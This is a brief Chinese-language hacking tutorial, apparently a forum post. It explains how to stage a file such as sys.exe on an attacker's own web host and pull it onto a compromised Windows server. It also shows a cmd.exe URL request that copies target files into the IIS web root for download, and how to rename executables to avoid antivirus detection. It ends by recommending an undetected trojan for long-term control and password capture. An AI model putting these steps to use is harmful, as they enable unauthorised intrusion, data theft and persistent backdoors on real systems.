首先你必须要有一个主页空间,把要上传的文件先上传到主页,然后打开终端,连接服务器,
跳至url中http://主页/文件
如http://***。***。***/sys.exe
然后会出现下载的页面,保存或运行。
实现下载是这样的:
先在浏览器中Http://ip/scripts/cmd.exe?/c+copy+目标文件 c:\inetpub\wwwroot\目标文件.zip
然后就可以实现下载了.
但下载后怎么运行?很简单,就是改变它的属性:
查看--->文件夹选项--->查看--->将"隐藏已知的文件的扩展名"的勾去掉
再回到文件,将它重命名,改属性为原来的属性
如http://ip/cmd.zip(把cmd.exe改为了cmd.zip实现下载) 然后执行上面的步骤,改回cmd.exe就可以了!
这样我们就能实现上传下载了!我们把上载的文件改为一个不被病毒防火墙所查杀的木马,我们就能长期控制和知道它的密码了。
(cmd.exe请改名,以躲过杀毒软件的检查!)